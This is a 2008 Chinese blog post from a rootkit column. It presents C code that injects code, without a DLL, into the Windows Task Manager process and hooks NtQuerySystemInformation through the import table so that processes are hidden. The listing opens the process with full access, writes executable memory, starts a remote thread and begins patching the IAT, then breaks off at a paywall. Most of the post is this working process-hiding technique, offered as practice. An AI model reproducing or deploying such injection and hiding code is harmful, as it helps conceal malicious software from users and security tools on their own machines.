代码注入 API HOOK(非DLL)

于 2008-10-14 08:53:00 发布
阅读量1.9k 收藏 5
点赞数
分类专栏: ROOTKIT 文章标签: dll hook api descriptor basic import
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalixux/article/details/3072436
版权
使用代码注入来实现进程隐藏  而不是使用DLL注入来实现进程隐藏  
没有什么高级技术  纯体力活  原理就不说了  只是没有通过DLL注入  来实现HOOK API
从核心编程 以来  似乎 一提到C注入 就是DLL注入 很奇怪 为什么没人写个完整的代码注入
所以 自己动手写了下
纯粹注入代码   邪恶二进制上 也有个代码注入的 只是用了一个未公开的函数,我还看不懂
= =本来想用汇编写的  发现汇编注入代码远比C注入代码来的繁  所以用C实现了
主要功能就是 隐藏进程   不过RING3的似乎没多大用  练习而已
代码如下:
  1. //需要编译成release版本  DEBUG版本 对函数生成的跳转地址表
  2. //jmp xxxxx  写入远程进程的时候xxxxx等于写入了一个全局变量
  3. // 程序必然崩溃
  4. #include "Iat_Hook.h"
  7. char cPath[] = "taskmgr.exe";
  9. void main(void)
  10. {
  11.   //定义变量
  12.   DWORD dwPid;
  13.   HANDLE hProcess;
  14.   DWORD dwSize = 2048;
  15.   PVOID pRemoteAddress, pRemoteStructAddress,MyAddress;
  16.   REMOTESTRUCT stRemoteStruct;
  18.   //遍历进程 寻找taskmgr.exe进程ID
  19.     dwPid = GetProcessPid(cPath);
  21.   // open process 得到进程句柄
  22.   hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
  23.   if(hProcess == NULL)
  24.   {
  25.     printf("open error code %d/n",GetLastError());
  26.     return;
  27.   }
  28.   
  29.   //写入 替代函数
  30.   MyAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  31.   WriteProcessMemory(hProcess, MyAddress, myNtQuerySystemInformation, dwSize, NULL);
  33.   //初始化结构
  34.   InitializeStruct(&stRemoteStruct, (DWORD)MyAddress, dwPid);
  36.   //写入结构
  37.   pRemoteStructAddress = VirtualAllocEx(hProcess, NULL, sizeof(REMOTESTRUCT), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  38.   WriteProcessMemory(hProcess, pRemoteStructAddress, &stRemoteStruct, sizeof(REMOTESTRUCT), NULL);
  40.   //写入远程线程函数
  41.   pRemoteAddress = VirtualAllocEx(hProcess, NULL, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  42.   WriteProcessMemory(hProcess, pRemoteAddress, RemoteThread, dwSize, NULL);
  44.   //创建远程线程
  45.   CreateRemoteThread(hProcess, NULL, 0, pRemoteAddress,pRemoteStructAddress, 0, 0);
  46.   CloseHandle(hProcess);
  47. }
  49. DWORD __stdcall RemoteThread(PREMOTESTRUCT pRemoteStruct)
  50. {
  51.   FARPROC fpVirtualQuery;
  52.   FARPROC fpVirtualProtect;
  53.   FARPROC fpOpenProcess;
  54.   FARPROC fpEnum;
  55.   FARPROC fpGetProcAddress;
  56.   FARPROC fpLoadLibrary;
  57.   FARPROC fpFreeLibrary;
  58.   FARPROC fpWriteMemory;
  59.   FARPROC fplstrcmp;
  61.   HANDLE hProcess = NULL;
  62.   HMODULE hMods[256];
  63.   DWORD dwNeed;
  64.   HANDLE hPsapi;
  65.   MEMORY_BASIC_INFORMATION stMem;
  66.   HMODULE hKernel, hModule;
  67.   PIMAGE_NT_HEADERS pImageNtHeaders;
  68.   PIMAGE_OPTIONAL_HEADER pImageOptionalHeader;
  69.   IMAGE_DATA_DIRECTORY ImageImport;
  70.   PIMAGE_IMPORT_DESCRIPTOR pImageImportDescriptor;
  71.   PIMAGE_THUNK_DATA pImageThunkData;
  72.   DWORD oldProtect;
  73.   wchar_t *p = pRemoteStruct->cProcessName;
  75.   //初始化函数指针
  76.   fpVirtualQuery = (FARPROC)pRemoteStruct->dwVirtualQuery;
  77.   fpVirtualProtect = (FARPROC)pRemoteStruct->dwVirtualProtect;
  78.   fpOpenProcess = (FARPROC)pRemoteStruct->dwOpenProcess;
  79.   fpLoadLibrary = (F
最低0.47元/天 解锁文章
dalixux
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值